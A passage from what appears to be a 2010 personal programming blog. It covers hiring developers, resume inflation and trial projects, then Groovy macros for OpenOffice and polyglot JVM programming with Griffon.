One fellow said he knew PHP and MySql. Turns out his experience consisted of a single small project he’d done for fun, at work. He was working as a tech support person at a local community college, and one of his main tasks was to help people when they forgot their passwords. So he wrote a tiny database program into which he could record usernames and passwords and email addresses. This consisted of about 6 screens. The PHP code was unbelievably primitive: he didn’t know what functions were, so when he wanted to break up his code into pieces, he put each routine into its own file, and then he would include that file when he wanted to trigger the code. And all the HTML was hard coded into the PHP. Awful. And the poor guy had no idea how much he still had to learn.

We spoke to a woman who said she knew Java, but had no Java projects that she could point us to, not even little demos on her laptop.

Many of the people we spoke to were just moving past the point of unconscious incompetence. They simply had no idea how they appeared to us.

We spoke to a lot of people who were clearly beginners, yet they claimed to know more technologies than I do. A typical list: Javascript, CSS, HTML, XHTML, RSS, Atom, Flash, ActionScript, Java, .Net, C, C++, Python, Perl, PHP, Linux, MySql, Oracle, Microsoft Server, Windows, Apache, IIS, Photoshop, FinalCut Pro, iMovies, Mac OS, and SOAP.

…What a lot of beginners seem to do is they include on their resume stuff they were briefly exposed to during some class in college. So if, for one day, they got to write some SQL queries against a dummy database set up in Oracle, they then claimed that they knew Oracle. I think what this approach communicates, more than anything, is insecurity. I realize that it is tough to get one’s career started, but still, you might want to leave off the stuff that you’ve only had a day or two exposure to.

The more extreme cases can be weeded out with an interview. For the rest, sometimes you can get a sense of who they are if they have a blog. But a lot of the times, it comes down to giving people a try, and see how they do.

There are a lot of decisions where an argument can be made for 2 radically different approaches. I had a conversation this summer, with a programmer who did very good work, about how many databases should be in use on our website. I felt that the right answer was “one”, they felt the right answer was “two”. Part of the site was being built in Symfony, and part of the site was simply a WordPress blog. He argued that putting each application in its own database was “loose coupling”. In this case, I thought it would be a huge headache. We wanted to integrate data from both applications on our home page, and the idea of drawing data from 2 different databases to create our homepage struck me as way too much work. He was aggressive in defending his opinion and he regarded my final decision with a certain amount of contempt. All the same, the programming he did was excellent, and he was very fast, so I’d hire him again for future projects (though I wouldn’t take his advice on architectural decisions).

When I think about the next time I might hire, I think about how I might give someone a try without wasting too much money. I’d like to think that its possible to figure out who is good, and who is bad, after just a week or two of working together. The big challenge is the 6 month wait that Steele describes:

Most folks need six months to settle in, get embedded in team dynamics, and learn enough of the problem domain to be useful.

I try to find tasks that only take a week and which reveal a lot about what kind of programmer I’m dealing with. This is a large-scale version of asking for a code snippet. This worked out well for us when I was at Bluewall and we were looking for a Flash programmer. After I interviewed her, I decided to give a very short, small project to Starrie Williamson. I liked how she handled her first, small assignment, so we ended up working with her for the next year.

Groovy as a script language for Open Office

Wednesday, January 13th, 2010

I post this only because I am impressed with the extent to which the JVM world is now able to fight back against Microsoft. Record macros in OpenOffice with Groovy

Windows/Mac/Linux (OpenOffice): Free OpenOffice extension Groovy makes it possible to record and run Macros in OpenOffice. Don’t confuse Groovy for a cheap Visual Basic knockoff. Groovy has its own syntax similar to bash mixed with Java. If you were sticking to Microsoft Office solely for its macro capabilities, you may be able to break away with Groovy. Unfortunately, Groovy is not nearly as beginner friendly as VB/VBA. However, beginners will have no problem getting started with simple macros. Groovy is a free extension for all platforms with OpenOffice. Here is an ODT with several sample macros to help you get your feet wet (remember, you need to install Groovy before you can run the macros).

Polyglot programming: the best of everything, all combined

Wednesday, January 13th, 2010

I first got interested in Java in 2003. I played around with it for year, doing minor toy projects. I finally decided that I hated it — too verbose, too redundant, too much aimed at the Enterprise, not dynamic or agile. Java is inappropriate for fast moving startups. I turned my back on Java and therefore missed the explosion of dynamic languages that run on the JVM: Jython, JRuby, JavaFX, Groovy, etc. In other words, I turned my back on the Java ecosystem just at the moment that it finally started to get interesting.

About a year ago I began to focus again on the world of the JVM. At first I was over-enthusiastic about JavaFX. Then I was frustrated by its lack of progress. Some at Sun have talked as if JavaFX was Swing 2.0, the future of Java GUI programming. But with JavaFX one has to jump through some hoops to integrate with Java code, whereas other JVM languages, such as Groovy, allow seamless integration.

Given that background, I am fascinated to read that Griffon is making it easier to do polyglot programming with the JVM languages:

If you’ve followed the Griffon news in the last 12 months you may be aware that Griffon is a fun and rapid desktop/rich application development framework inspired by Grails; that there are more than 40 released plugins and that polyglot programming is a pretty much a done deal (Groovy, Java, JavaFX, Scala & Clojure). Griffon was born as a means to get Swing applications off the ground quickly; a few months ago it gained the capability of mixing Swing and JavaFX components in the same application.

Just recently it went a bit further than that.

Swing is not the only toolkit that can be used with Java in order to create a desktop applications, JavaFX is clearly one alternative (though at the time of writing this entry it still lacks a full set of controls and a healthy ecosystem of 3rd part components, but that’s another story). There is also SWT, which provides better fidelity as it talks to native widgets directly as opposed to Swing. However that also imposes some restrictions (like skinning) but that has not kept the proponents of the toolkit (and Eclipse) from using it at every turn. There is also another newcomer: Pivot. Fresh from VMWare labs it quickly found a place at the Apache Incubator where it’s been nurtured and awaits the moment of graduation.

What do these toolkits have to do with Griffon? Well as it turns out there is experimental (i.e, not finished yet) support for both SWT and Pivot.